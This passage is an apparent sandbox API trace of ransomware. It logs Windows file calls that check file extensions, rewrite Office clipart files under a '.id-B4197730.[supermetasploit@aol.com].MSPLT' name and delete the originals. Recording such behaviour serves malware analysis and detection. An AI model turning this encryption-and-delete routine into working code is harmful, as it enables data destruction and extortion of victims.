(lpString1=".rar", lpString2=".WMF") returned -1 [0312.520] lstrlenW (lpString=".bz2") returned 4 [0312.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.521] lstrlenW (lpString=".7z") returned 3 [0312.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.521] lstrlenW (lpString=".dbf") returned 4 [0312.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.521] lstrlenW (lpString=".1cd") returned 4 [0312.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.521] lstrlenW (lpString=".jpg") returned 4 [0312.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.521] lstrlenW (lpString=".doc") returned 4 [0312.521] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.521] lstrlenW (lpString=".docx") returned 5 [0312.521] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.522] lstrlenW (lpString=".pdf") returned 4 [0312.522] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.522] lstrlenW (lpString=".xls") returned 4 [0312.522] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.522] lstrlenW (lpString=".xlsx") returned 5 [0312.522] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.522] lstrlenW (lpString=".ppt") returned 4 [0312.522] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.522] lstrlenW (lpString=".zip") returned 4 [0312.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.522] lstrlenW (lpString=".rar") returned 4 [0312.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.522] lstrlenW (lpString=".bz2") returned 4 [0312.522] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.522] lstrlenW (lpString=".7z") returned 3 [0312.522] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.522] lstrlenW (lpString=".dbf") returned 4 [0312.522] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.523] lstrlenW (lpString=".1cd") returned 4 [0312.523] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.523] lstrlenW (lpString=".jpg") returned 4 [0312.523] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.523] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.523] lstrlenW (lpString="BS00441_.WMF") returned 12 [0312.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0312.524] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=3524) returned 1 [0312.524] CloseHandle (hObject=0x3e4) returned 1 [0312.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf")) returned 0x220 [0312.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0312.526] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.526] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0312.635] GetLastError () returned 0x0 [0312.635] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xdc4, lpOverlapped=0x0) returned 1 [0313.214] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xdd0, lpOverlapped=0x0) returned 1 [0313.216] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0313.216] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0313.216] SetEndOfFile (hFile=0x53c) returned 1 [0313.288] CloseHandle (hObject=0x53c) returned 1 [0313.301] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0313.301] SetEndOfFile (hFile=0x3e4) returned 1 [0313.324] CloseHandle (hObject=0x3e4) returned 1 [0313.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0313.325] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf")) returned 1 [0313.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.326] lstrlenW (lpString=".doc") returned 4 [0313.326] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0313.326] lstrlenW (lpString=".docx") returned 5 [0313.326] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0313.326] lstrlenW (lpString=".pdf") returned 4 [0313.326] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0313.326] lstrlenW (lpString=".xls") returned 4 [0313.326] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0313.326] lstrlenW (lpString=".xlsx") returned 5 [0313.326] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0313.326] lstrlenW (lpString=".ppt") returned 4 [0313.326] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0313.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.327] lstrlenW (lpString=".zip") returned 4 [0313.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0313.327] lstrlenW (lpString=".rar") returned 4 [0313.327] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0313.327] lstrlenW (lpString=".bz2") returned 4 [0313.327] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0313.327] lstrlenW (lpString=".7z") returned 3 [0313.327] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0313.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.327] lstrlenW (lpString=".dbf") returned 4 [0313.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0313.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.327] lstrlenW (lpString=".1cd") returned 4 [0313.327] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0313.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.327] lstrlenW (lpString=".jpg") returned 4 [0313.327] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0313.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.328] lstrlenW (lpString=".doc") returned 4 [0313.328] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0313.328] lstrlenW (lpString=".docx") returned 5 [0313.328] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0313.328] lstrlenW (lpString=".pdf") returned 4 [0313.328] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0313.328] lstrlenW (lpString=".xls") returned 4 [0313.328] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0313.328] lstrlenW (lpString=".xlsx") returned 5 [0313.328] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0313.328] lstrlenW (lpString=".ppt") returned 4 [0313.328] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0313.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.328] lstrlenW (lpString=".zip") returned 4 [0313.328] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0313.328] lstrlenW (lpString=".rar") returned 4 [0313.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0313.328] lstrlenW (lpString=".bz2") returned 4 [0313.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0313.329] lstrlenW (lpString=".7z") returned 3 [0313.329] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0313.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.329] lstrlenW (lpString=".dbf") returned 4 [0313.329] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0313.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.329] lstrlenW (lpString=".1cd") returned 4 [0313.329] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0313.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0313.329] lstrlenW (lpString=".jpg") returned 4 [0313.329] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0313.329] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0313.330] lstrlenW (lpString="BS00453_.WMF") returned 12 [0313.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0314.032] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=2436) returned 1 [0314.032] CloseHandle (hObject=0x420) returned 1 [0314.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf")) returned 0x220 [0314.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0314.944] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.945] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0314.946] GetLastError () returned 0x0 [0314.946] ReadFile (in: hFile=0x548, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x984, lpOverlapped=0x0) returned 1 [0314.961] WriteFile (in: hFile=0x538, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x990, lpOverlapped=0x0) returned 1 [0314.963] ReadFile (in: hFile=0x548, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0314.963] WriteFile (in: hFile=0x538, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0314.964] SetEndOfFile (hFile=0x538) returned 1 [0314.964] CloseHandle (hObject=0x538) returned 1 [0314.964] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.964] SetEndOfFile (hFile=0x548) returned 1 [0314.971] CloseHandle (hObject=0x548) returned 1 [0314.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0314.972] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf")) returned 1 [0314.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.973] lstrlenW (lpString=".doc") returned 4 [0314.973] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.973] lstrlenW (lpString=".docx") returned 5 [0314.973] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.973] lstrlenW (lpString=".pdf") returned 4 [0314.973] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.973] lstrlenW (lpString=".xls") returned 4 [0314.973] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.973] lstrlenW (lpString=".xlsx") returned 5 [0314.973] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.973] lstrlenW (lpString=".ppt") returned 4 [0314.973] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.974] lstrlenW (lpString=".zip") returned 4 [0314.974] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.974] lstrlenW (lpString=".rar") returned 4 [0314.974] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.974] lstrlenW (lpString=".bz2") returned 4 [0314.974] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.974] lstrlenW (lpString=".7z") returned 3 [0314.974] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.974] lstrlenW (lpString=".dbf") returned 4 [0314.974] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.974] lstrlenW (lpString=".1cd") returned 4 [0314.974] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.974] lstrlenW (lpString=".jpg") returned 4 [0314.975] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.975] lstrlenW (lpString=".doc") returned 4 [0314.975] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.975] lstrlenW (lpString=".docx") returned 5 [0314.975] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.975] lstrlenW (lpString=".pdf") returned 4 [0314.975] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.975] lstrlenW (lpString=".xls") returned 4 [0314.975] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.975] lstrlenW (lpString=".xlsx") returned 5 [0314.975] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.975] lstrlenW (lpString=".ppt") returned 4 [0314.976] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.976] lstrlenW (lpString=".zip") returned 4 [0314.976] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.976] lstrlenW (lpString=".rar") returned 4 [0314.976] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.976] lstrlenW (lpString=".bz2") returned 4 [0314.976] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.976] lstrlenW (lpString=".7z") returned 3 [0314.976] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.976] lstrlenW (lpString=".dbf") returned 4 [0314.976] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.976] lstrlenW (lpString=".1cd") returned 4 [0314.976] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0314.976] lstrlenW (lpString=".jpg") returned 4 [0314.976] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.977] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.977] lstrlenW (lpString="CLASSIC1.WMF") returned 12 [0314.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0314.978] GetFileSizeEx (in: hFile=0x548, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=2422) returned 1 [0314.978] CloseHandle (hObject=0x548) returned 1 [0314.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf")) returned 0x220 [0314.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0314.979] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.979] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0314.980] GetLastError () returned 0x0 [0314.980] ReadFile (in: hFile=0x548, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x976, lpOverlapped=0x0) returned 1 [0315.011] WriteFile (in: hFile=0x538, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x980, lpOverlapped=0x0) returned 1 [0315.013] ReadFile (in: hFile=0x548, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0315.014] WriteFile (in: hFile=0x538, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0315.014] SetEndOfFile (hFile=0x538) returned 1 [0315.014] CloseHandle (hObject=0x538) returned 1 [0315.014] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.014] SetEndOfFile (hFile=0x548) returned 1 [0315.019] CloseHandle (hObject=0x548) returned 1 [0315.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0315.020] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf")) returned 1 [0315.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.021] lstrlenW (lpString=".doc") returned 4 [0315.021] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.021] lstrlenW (lpString=".docx") returned 5 [0315.021] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0315.021] lstrlenW (lpString=".pdf") returned 4 [0315.021] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.022] lstrlenW (lpString=".xls") returned 4 [0315.022] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.022] lstrlenW (lpString=".xlsx") returned 5 [0315.022] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0315.022] lstrlenW (lpString=".ppt") returned 4 [0315.022] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.022] lstrlenW (lpString=".zip") returned 4 [0315.022] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.022] lstrlenW (lpString=".rar") returned 4 [0315.022] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.022] lstrlenW (lpString=".bz2") returned 4 [0315.022] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.022] lstrlenW (lpString=".7z") returned 3 [0315.022] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.022] lstrlenW (lpString="C:\\Program 